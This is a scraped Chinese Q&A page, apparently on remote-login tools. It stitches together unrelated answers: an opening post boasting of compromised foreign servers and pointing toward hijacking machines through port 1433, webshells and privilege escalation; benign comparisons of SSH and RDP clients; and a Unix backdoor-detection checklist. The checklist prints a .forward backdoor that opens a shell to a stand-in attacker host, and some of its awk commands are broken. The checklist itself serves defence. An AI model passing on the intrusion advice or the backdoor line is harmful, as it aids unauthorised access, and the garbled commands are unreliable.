如果你想用这种软件爆服务器,现实会令你很失望的!
服务器以前倒是抓到几台,韩国、岛国的都有,现在估计都不能登录了
不过我可不是3389软件爆出来的,
要想抓鸡的话,你还是看看1433 这些吧。用大、小马入侵,提权应该有所收获~
求给分,谢谢!
你说的是终端软件吧,这个就非常多啦,下面我简单介绍几个,感兴趣的朋友可以自己尝试一下:
powershell这是win10系统自带的一个命令行工具,cmd命令提示符的增强版, 基本功能和bash差不多, 可以直接运行大部分shell命令,使用起来非常轻便快捷,如果你对终端功能要求不高的话,可以使用一下这个工具:
putty
这是一个非常轻巧灵活的终端软件,操作简单,免费开源,目前主要应用在windows平台下(其他平台正在推广中),集成了Telnet,SSH,rlogin等客户端工具,可以很方便的远程登录和 管理 服务器,如果你追求轻便灵活的话,可以使用这个终端软件:
xshell
这是一个使用非常广泛的终端软件,在业界比较受欢迎、也比较流行,支持多窗口切换以及常见的SHH,Telnet,SFTP等协议,可以很方便的进行 文件的 上传下载,如果你对终端功能要求比较高,管理的服务器比较多的话,可以考虑使用一下这个软件,非常不错:
mobaxterm
这是一个比较全能的终端软件,完全免费,不仅可以像 putty 一样通过 SSH 连接远程服务区,也像 winscp 一样使用 SFTP、SCP 等协议进行文件传输,内建多标签和多终端分屏,此外还支持 VNC、RDP、Xdmcp 等远程桌面连接方式,功能非常强大:
securecrt
这也是一款非常不错的终端软件,集成了SSH、Telnet、rlogin等客户端工具,自带有文件传输工具,可以很方便的进行文件的上传和下载,界面风格调整、多窗口切换等都非常不错,对于远程连接和管理服务器来说,也是一个非常不错的选择:
目前,就介绍这5个不错的终端软件吧,对于日常连接和管理服务器来说,完全够用了,当然,还有许多其他终端软件,像finalshell等,也都非常不错,选择适合自己的一款就行,网上也有相关教程和资料,介绍的非常详细,感兴趣的话,可以搜一下,希望以上分享的内容能对你有所帮助吧,也欢迎大家评论、留言进行补充。
我推荐两个。
1、SecureCRT 2、ZOC
MobaXterm,我感觉比较好用的一个SSH客户端,支持SSH、FTP等多种协议,而且可以保存SSH登录密码,下次直接点击就可以登陆。
当然如果你会设置服务器PubKey登录的话更简单了。
远程连接服务器,我们可以列举出四种情况吧.
windows连windows,
windows连linux,
linux连windows,
linux连linux.
mac系统用的少,我们可以把他当成linux系统来看待
在介绍之前.我们可以先说明一款TeamView的软件,windows,linux和mac系统都有对应的安装包,这是一款远程桌面连接工具,我们公司之前远程印度那边的机器就是用的这款软件.操作简单,缺点是你必须在客户端和服务端同时安装TeamView,
windows连windows
用windows自带的远程桌面连接就可以.很方便的
windows连linux
用windows的cmd或者powershell,通过ssh连接
ssh 用户名@IP
当然,你也可以自行安装别的shell软件,如xsell和secureCRT等
linux连windows
这需要在你的linux上安装一个rdesktop的程序,
rdesktop -a 16 -f ip
mac系统不能使用rdesktop,好像是用别的方案(Microsoft Remote Desktop for Mac).具体没有用过.
linux连linux
跟windows连linux一样的道理,也是通过ssh连接
ssh 用户名@IP
如果没有特殊的需求,这里推荐使用系统自带的终端就可以,系统自带,不用费心去安装.
如果有别的需求可以安装别的终端软件,我使用的两款在这里说一下
Terminator 可以在一个窗口开多个终端.有那种比较需求的,很方便的
secureCRT 这个也是都有windows,linux,mac系统的安装包,我基本是用他来传输文件用的,rz/sz命令,我只在这个软件上用成功过.如果你的目标服务器不能直接链接,需要借助跳板机的话,rz可以直接选择文件,传输到目标服务器上,不需要你去操作跳板机
远程登录服务器的工具有很多,但每个工具都有自己的优点和缺点,无法做到全能。用什么工具还得看服务器使用的是哪种远程连接的协议,要不就变成了大炮打蚊子,白瞎。
Telnet是最早使用的远程登录协议Telnet协议是TCP/IP协议簇中的一员,它是早期互联网远程登录服务的主要协议标准,所以绝大多数70、80、90后对于它并不陌生。过去不管是Windows、Linux、MacOS,还是路由器、交换机等等网络设备都可以使用Telnet通过命令进行远程控制,就跟控制本地的电脑一样简单。UNIX则使用Rlogin来进行服务器的远程控制。
但Telnet是一种不安全的文字命令接口协议,客户端和服务器之间的Telnet是未经加密的,可以访问通信主机之间的TCP/IP数据包流的任何人都可以重建在端点之间流经的数据,包括用于登录到服务器的用户名和密码。一旦入侵者与服务器建立了Telnet连接就可以控制服务器的软、硬件资源。
所以渐渐地Windows、Linux、MacOS就将Telnet从系统软件中删除,网络设备也建立的开关的机制。但仍然有很多的系统、网络管理员、专业安全人员,包括很多的普通人都喜欢使用Telnet,仅仅通过Windows的CMD,Linux、MacOS的终端就可以建立连接,当然现在要使用需要安装相应的程序,因为系统已经不再默认包含Telnet了。
SSH是Telnet的继任者SSH出现的目的就是为了取代之前Telnet协议的不足,免遭网络的嗅探攻击。SSH是一种建立在应用层和传输层基础上的加密网络传输协议,可以为远程登录会话提供安全性的连接。
目前几乎所有的操作系统都支持SSH,SSH除了可以进行远程访问之外,还支持隧道协议、端口映射、X11连接,借助SFTP或者SCP协议,SSH甚至还可以传输文件。
通常情况下我们会使用Putty、WinSCP、xshell、Mobaxterm、SecureCRT、Terminus、Electerm、Finallshell、SimpleRemote、Zoc Terminal、XManager来创建SSH远程访问。当然Linux、MacOS系统自带的终端模拟器,以及Windows的PowerShell也可以通过SSH命令直接登录服务器,但讲真确实没有上面的软件来得好用。
图形化的远程登录协议单纯的SSH只能与远程的服务器进行命令交互,但借助X11已经可以进行图形化的操作了。
Windows默认使用的一种图形化远程桌面协议是RDP(即Remote Desktop Protocol),只需要通过Windows自带的远程桌面连接就可以远程的访问另一台局域网电脑或者具有公网IP地址的服务器。
与RDP相对应的就是应用在Linux上的XRDP,XRDP接收来自各种RDP客户端的连接,不管是FreeRDP、rdesktop、NeutrinoRDP等等还是Windows自带的远程桌面连接,适用于Windows、MacOS、Linux、IOS和Android。
提到远程桌面连接不得不提到基于RFB协议,就是VNC所使用的协议,它也是一款优秀的远程控制工具,适用于所有的窗口系统,相信很多人都用过。RDP协议更倾向于传输指令,而RFB协议更倾向于传输图像,在完成同样的操作情况下,RFB的数据传输量比RDP要大。VNC软件通常会使用RealVNC、UltraVNC、TightVNC、x11VNC。
图形化的远程登录协议还有Xdmcp、FreeNX、Xpra等等,这里就不再多做介绍,感兴趣的小伙伴们可以网上单独了解。
远程登录还有一些专有协议这里提到远程登录的专用协议相信很多人会一脸懵逼,如果说起鼎鼎大名的TeamViewer相信大家就会豁然开朗。TeamViewer实现远程登录就是基于它自己的专有协议,这种协议是属于TeamViewer这家公司的。TeamViewer并不需要公网IP就可以实现两台电脑之间的远程控制,并且兼容市面上几乎所有的电脑操作系统和手机操作系统,也可以通过浏览器去远程控制一台运行TeamViewer的机器。
TeamViewer的火爆程度可想而知,但TeamViewer自作之路,普通人连续控制两台以上远程设备就会提示你不能用于商业用途,并且不能再用。后来TeamViewer被爆黑客攻击,使得很多人对它失去了信心,再加上向日葵、Todesk、Anywhere等等基于专有协议的远程控制软件的相继出现,好用免费快速的挤占了TeamViewer的市场份额。
总结远程登录服务器的软件好不好用,还是要看基于什么协议,然后还要看用的人做什么用途。
喜欢我的,请关注我,再次感谢!
这个问题其实可以追溯到支持远程登录的协议,只要支持对应协议的工具就可以实现远程登录。具体的协议可以包括:windows自带的RDP协议(就是远程桌面连接那个应用背后的协议),ssh协议,VNC、telnet、ftp等(有一些协议的行为受限制,只能进行一些预定的动作)。具体的工具要看目标服务器支持的协议类型。
一、windows登录windows
windows自带的 远程桌面连接 工具可以很便捷的达到登录到远程windows的目的。在使用时,目标主机需要开启允许“允许运行任意版本远程桌面的计算机连接”的选项,同时需要在windows防火墙上开放相应的策略或关闭防火墙。
二、linux登录windows
linux环境下可以使用 Rdesktop 来实现登录远程windows。小窝头还没有这么试过,一般情况下linux都是作为服务器的存在,windows做操作终端的情况会多一些。
三、windows登录linux
支持这种场景的工具有很多啦,短小精干的 putty ,经典的 SecureCRT , XManager 系列都是用的比较多的,我个人还是比较钟爱SecureCRT,没有原因,只是一种习惯而已。此外,XManager系列还拥有图形化安装的能力,宗旨XManager系列是非常强大的产品,建议题主可以尝试。
四、linux登录linux
直接ssh命令搞起~。
五、使用远程控制工具实现设备间的相互访问
TeamViewer和向日葵都是挺不错的工具,但是登陆服务器的口令就会变成TeamViewer或者向日葵分配的编号或口令了,在远程控制方面用的会多一些,但是确实也实现了远程登录服务器。
以上就是我的分享~希望对您有帮助。
大家好,我是 科技 互联网大叔,今天我来回答下这个问题。
首先我审下题目,我理解题主想问的是,用办公电脑连接远程服务器,办公电脑一般为windows或者mac,服务器一般为linux服务器,有什么好用而且免费的工具。基于我对题目的理解,我来做如下的回答:
第一、办公电脑为windowswindows远程连接linux服务器的办法很多,基本走的是SSH协议。 SSH是Secure Shell 的缩写,由 IETF 的网络小组所制定,SSH 为建立在应用层基础上的安全协议。常见的工具有putty、xshell、secureCRT。
1、putty
putty是一个集成SSH、TELNET、TCP协议的远程连接软件,工具体积极小,操作简单,没有太复杂的功能和交互,属于特别轻巧的一个小产品,用起来很舒服,但如果你想要很多集成的功能,它可能不太适合你。
2、xshell
xshell我非常喜欢用,它功能丰富,而且很容易找到比较好的版本下载。xshell的界面我也非常喜欢,用起来特别顺滑。
3、secureCRT
secureCRT也是一款广泛使用的产品,最早我入行的时候,老师傅们基本也是推荐我这款产品,这款产品用起来也很不错,软件功能大而全,特别适合需要功能比较多的用户去用。
第二、办公电脑为MAC
1、mac自带teminal
mac自带的teminal终端很好用,基本可以满足你远程连接的所有需要,而且自带的不需要到处找资源下载,也不需要考虑付费的问题,用起来也特别的顺滑,真香。
2、ZOC
我用mac本的话比较喜欢使用ZOC的产品,这个产品用起来比较方便,比较好记录你的经常登录服务器信息,但不足之处是会经常提示你升级,有时候很麻烦。
以上就是我常用的远程连接服务器的工具,希望可以帮到你。
SecureCRT配合keepass免密
没人推荐finallshell吗?我用过最好用的,没有之一,比item都好
今天笔者就推荐几款远程连接服务器的终端工具,当然了已经有不少人分享了工具,不过笔者今天也会将各个工具的优缺点一并说出。
首先目前来说用的占比比较多的必然是Xshell这款工具,而且其School版是完全免费的,对于个人用户来说,这款工具还是非常方便和易用的,支持布局切换,同时也有多窗口支持,不过不是很好,同时单纯安装Xshell的话,是不自动Xftp工具的,需要另外安装。
第二款工具就是mobaxterm工具,这款工具可以说非常全能的工具了,更重要的是完全免费,而且其默认自带SFTP工具,可以很方便的从本机到服务器的文件传输,而且在分屏方面也有很大的优势,笔者在用了这款工具之后,可以说就没有在使用过Xshell了。
第三款就是一个比较小巧的工具Putty了,该工具安装包非常小,也是一个免费和开源的工具,对于一些对安装包有特殊情节的用户来说,这款工具可以说是首选甚至某些程序员对大小有强迫症的必选这个工具!
最后一款是Securecrt,这款工具国外用的还是比较广泛的,支持SSH1,SSH2,Telnet,RLogin,Serial协议等,缺点是键入比较困难,而且Script不能调整执行顺序等等!
1、检查系统密码文件
首先从明显的入手,查看一下passwd文件,ls –l /etc/passwd查看文件修改的日期。
检查一下passwd文件中有哪些特权用户,系统中uid为0的用户都会被显示出来。
1
awk –F:’==0 {print }’ /etc/passwd
顺便再检查一下系统里有没有空口令帐户:
1
awk –F: ‘length()==0 {print }’ /etc/shadow
2、查看一下进程,看看有没有奇怪的进程
重点查看进程:ps –aef | grep inetd
inetd是UNIX系统的守护进程,正常的inetd的pid都比较靠前,如果你看到输出了一个类似inetd –s /tmp/.xxx之类的进程,着重看inetd –s后面的内容。在正常情况下,LINUX系统中的inetd服务后面是没有-s参数的,当然也没有用inetd去启动某个文件;而solaris系统中也仅仅是inetd –s,同样没有用inetd去启动某个特定的文件;如果你使用ps命令看到inetd启动了某个文件,而你自己又没有用inetd启动这个文件,那就说明已经有人入侵了你的系统,并且以root权限起了一个简单的后门。
输入ps –aef 查看输出信息,尤其注意有没有以./xxx开头的进程。一旦发现异样的进程,经检查为入侵者留下的后门程序,立即运行kill –9 pid 开杀死该进程,然后再运行ps –aef查看该进程是否被杀死;一旦此类进程出现杀死以后又重新启动的现象,则证明系统被人放置了自动启动程序的脚本。这个时候要进行仔细查找:find / -name 程序名 –print,假设系统真的被入侵者放置了后门,根据找到的程序所在的目录,会找到很多有趣的东东J
UNIX下隐藏进程有的时候通过替换ps文件来做,检测这种方法涉及到检查文件完整性,稍后我们再讨论这种方法。
接下来根据找到入侵者在服务器上的文件目录,一步一步进行追踪。
3、检查系统守护进程
检查/etc/inetd.conf文件,输入:cat /etc/inetd.conf | grep –v “^#”,输出的信息就是你这台机器所开启的远程服务。
一般入侵者可以通过直接替换in.xxx程序来创建一个后门,比如用/bin/sh 替换掉in.telnetd,然后重新启动inetd服务,那么telnet到服务器上的所有用户将不用输入用户名和密码而直接获得一个rootshell。
4、检查网络连接和监听端口
输入netstat -an,列出本机所有的连接和监听的端口,查看有没有非法连接。
输入netstat –rn,查看本机的路由、网关设置是否正确。
输入 ifconfig –a,查看网卡设置。
5、检查系统日志
命令last | more查看在正常情况下登录到本机的所有用户的历史记录。但last命令依赖于syslog进程,这已经成为入侵者攻击的重要目标。入侵者通常会停止系统的syslog,查看系统syslog进程的情况,判断syslog上次启动的时间是否正常,因为syslog是以root身份执行的,如果发现syslog被非法动过,那说明有重大的入侵事件。
在linux下输入ls –al /var/log
在solaris下输入 ls –al /var/adm
检查wtmp utmp,包括messgae等文件的完整性和修改时间是否正常,这也是手工擦除入侵痕迹的一种方法。
6、检查系统中的core文件
通过发送畸形请求来攻击服务器的某一服务来入侵系统是一种常规的入侵方法,典型的RPC攻击就是通过这种方式。这种方式有一定的成功率,也就是说它并不能100%保证成功入侵系统,而且通常会在服务器相应目录下产生core文件,全局查找系统中的core文件,输入find / -name core –exec ls –l {} \依据core所在的目录、查询core文件来判断是否有入侵行为。
7、.rhosts和.forward
这是两种比较著名的后门文件,如果想检查你的系统是否被入侵者安装了后门,不妨全局查找这两个文件:
find / -name “.rhosts” –print
find / -name “.forward” –print
在某用户的$HOME下,.rhosts文件中仅包含两个+号是非常危险的,如果你的系统上开了513端口(rlogin端口,和telnet作用相同),那么任意是谁都可以用这个用户登录到你的系统上而不需要任何验证。
看到这里如果想要深入的做安全加固服务以及安全部署
就必须找专业做服务器的安全公司来处理了国内也就Sine安全和绿盟比较专业提供。
Unix下在.forward文件里放入命令是重新获得访问的常用方法在某一 用户$HOME下的.forward可能设置如下:
\username|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 –e /bin/sh"
这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases). 注意这只是一种简单的变换. 更为高级的能够从.forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后).利用smrsh可以有效的制止这种后门(虽然如果允许可以自运行的elm's filter或procmail类程序, 很有可能还有问题。在Solaris系统下,如果你运行如下命令:
ln -s /var/mail/luser ~/.forward
然后设置vacation有效,那么/var/mail/luser就会被拷贝到~/.forward,同时会附加"|/usr/bin/vacation me",旧的symlink被移到~/.forward..BACKUP中。
直接删除掉这两个文件也可以。
8、检查系统文件完整性
检查文件的完整性有多种方法,通常我们通过输入ls –l 文件名来查询和比较文件,这种方法虽然简单,但还是有一定的实用性。但是如果ls文件都已经被替换了就比较麻烦。在LINUX下可以用rpm –V `rpm –qf 文件名` 来查询,国家查询的结果是否正常来判断文件是否完整。在LINUX下使用rpm来检查文件的完整性的方法也很多,这里不一一赘述,可以man rpm来获得更多的格式。
UNIX系统中,/bin/login是被入侵者经常替换作为后门的文件,接下来谈一下login后门 :
UNIX里,Login程序通常用来对telnet来的用户进行口令验证。入侵者获取login的源代码并修改,使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门口令,它将忽视管理员设置的口令让你长驱直入:这将允许入侵者进入任何账号,甚至是root目录。由于后门口令是在用户真实登录并被日志记录到utmp和wtmP前产生的一个访问,所以入侵者可以登录获取shell却不会暴露该账号。管理员注意到这种后门后,使用”strings”命令搜索login程序以寻找文本信息。许多情况下后门口令会原形毕露。入侵者又会开始加密或者更改隐藏口令,使strings命令失效。所以许多管理员利用MD5校验和检测这种后门。UNIX系统中有md5sum命令,输入md5sum 文件名检查该文件的md5签名。它的使用格式如下:md5sum –b 使用二进制方式阅读文件;md5sum –c 逆向检查MD5签名;md5sum –t 使用文本方式阅读文件。
在前面提到过守护进程,对于守护进程配置文件inetd.conf中没有被注释掉的行要进行仔细比较,举个简单的例子,如果你开放了telnet服务,守护进程配置文件中就会有一句:telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd
可以看到它所使用的文件是 /usr/sbin/in.telnetd,检查该文件的完整性,入侵者往往通过替换守护进程中允许的服务文件来为自己创建一个后门。
LINUX系统中的/etc/crontab也是经常被入侵者利用的一个文件,检查该文件的完整性,可以直接cat /etc/crontab,仔细阅读该文件有没有被入侵者利用来做其他的事情。
不替换login等文件而直接使用进程来启动后门的方法有一个缺陷,即系统一旦重新启动,这个进程就被杀死了,所以得让这个后门在系统启动的时候也启动起来。通常通过检查/etc/rc.d下的文件来查看系统启动的时候是不是带有后门程序;这个方法怎么有点象查windows下的trojan?
说到这里,另外提一下,如果在某一目录下发现有属性为这样的文件:-rwsr-xr-x 1 root root xxx .sh,这个表明任何用户进来以后运行这个文件都可以获得一个rootshell,这就是setuid文件。运行 find –perm 4000 –print对此类文件进行全局查找,然后删除这样的文件。
9、检查内核级后门
如果你的系统被人安装了这种后门,通常都是比较讨厌的,我常常就在想,遇到这种情况还是重新安装系统算了J,言归正传,首先,检查系统加载的模块,在LINUX系统下使用lsmod命令,在solaris系统下使用modinfo命令来查看。这里需要说明的是,一般默认安装的LINUX加载的模块都比较少,通常就是网卡的驱动;而solaris下就很多,没别的办法,只有一条一条地去分析。对内核进行加固后,应禁止插入或删除模块,从而保护系统的安全,否则入侵者将有可能再次对系统调用进行替换。我们可以通过替换create_module()和delete_module()来达到上述目的。另外,对这个内核进行加固模块时应尽早进行,以防系统调用已经被入侵者替换。如果系统被加载了后门模块,但是在模块列表/proc/module里又看不到它们,有可能是使用了hack工具来移除加载的模块,大名鼎鼎的knark工具包就有移除加载模块的工具。出现这种情况,需要仔细查找/proc目录,根据查找到的文件和经验来判断被隐藏和伪装的进程。Knark后门模块就在/proc/knark目录,当然可能这个目录是隐藏的。
欢迎分享,转载请注明来源:夏雨云
微信扫一扫
支付宝扫一扫
评论列表(0条)